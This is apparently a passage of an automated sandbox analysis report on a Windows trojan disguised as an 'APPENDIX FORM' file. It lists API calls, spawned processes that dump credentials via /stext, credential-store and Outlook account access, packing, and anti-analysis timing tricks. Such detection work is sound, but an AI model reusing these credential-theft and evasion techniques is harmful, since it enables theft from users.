            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_00403219 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_00403219 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: String function: 004169A7 appears 87 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: String function: 0044DB70 appears 41 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: String function: 004165FF appears 35 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: String function: 00422297 appears 42 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: String function: 004029FF appears 51 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: String function: 00444B5A appears 37 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: String function: 00413025 appears 79 times
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: String function: 00416760 appears 69 times
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.1962616328.0000000032D91000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.1986503569.00000000028E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333CB000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.1966707690.00000000028CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000003.1986604309.00000000028E2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe | Binary or memory string: OriginalFileName vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe | Binary or memory string: OriginalFilename vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.000000000041B000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@9/14@1/2
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_0040440C GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_00402036 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File created: C:\Program Files (x86)\Common Files\situationer.ini
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File created: C:\Users\user\AppData\Roaming\Orkestral
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-CDCZ2K
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File created: C:\Users\user~1\AppData\Local\Temp\nso3C28.tmp
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | System information queried: HandleInformation
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623139235.00000000332C0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985807652.000000000096F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe | ReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File read: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
            Source: unknown | Process created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hhicqmxmcuubmwccmnspqit"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\rjnmrfinqcmgocyodymjbnnrmv"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\bdsfsxbheketyimsnjzkeaiancxhuh"
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe"Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\hhicqmxmcuubmwccmnspqit"Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\rjnmrfinqcmgocyodymjbnnrmv"Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeProcess created: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe "C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe" /stext "C:\Users\user\AppData\Local\Temp\bdsfsxbheketyimsnjzkeaiancxhuh"Jump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: pediculofrontal.lnk.0.drLNK file: ..\..\..\ProgramData\Microsoft\Windows\Templates\jeblets.Bul
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeFile opened: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.cfgJump to behavior
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior

            Data Obfuscation

            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Unpacked PE file: 8.2.APPENDIX FORM_N#U00b045013-20241120.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Unpacked PE file: 9.2.APPENDIX FORM_N#U00b045013-20241120.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Unpacked PE file: 10.2.APPENDIX FORM_N#U00b045013-20241120.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: Yara match | File source: 00000000.00000002.1832413744.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_0040600B GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040600B
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_10002D40 push eax; ret 0_2_10002D6E
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333F1219 push esp; iretd 4_2_333F121A
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E2806 push ecx; ret 4_2_333E2819
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_0044693D push ecx; ret 8_2_0044694D
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_0044DB70 push eax; ret 8_2_0044DB84
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_0044DB70 push eax; ret 8_2_0044DBAC
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_00451D54 push eax; ret 8_2_00451D61
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_0044B090 push eax; ret 9_2_0044B0A4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_0044B090 push eax; ret 9_2_0044B0CC
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_00451D34 push eax; ret 9_2_00451D41
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_00444E71 push ecx; ret 9_2_00444E81
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_00414060 push eax; ret 10_2_00414074
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_00414060 push eax; ret 10_2_0041409C
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_00414039 push ecx; ret 10_2_00414049
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_004164EB push 0000006Ah; retf 10_2_004165C4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_00416553 push 0000006Ah; retf 10_2_004165C4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_00416555 push 0000006Ah; retf 10_2_004165C4
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | File created: C:\Users\user\AppData\Local\Temp\nsc44A6.tmp\System.dll
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_004047CB
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | API/Special instruction interceptor: Address: 39F0312
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | API/Special instruction interceptor: Address: 1EC0312
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | RDTSC instruction interceptor: First address: 39C96CC second address: 39C96CC instructions: 0x00000000 rdtsc 0x00000002 cmp bh, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FBF6C5232B8h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | RDTSC instruction interceptor: First address: 1E996CC second address: 1E996CC instructions: 0x00000000 rdtsc 0x00000002 cmp bh, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FBF6C8165A8h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040DD85
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Window / User API: threadDelayed 9718
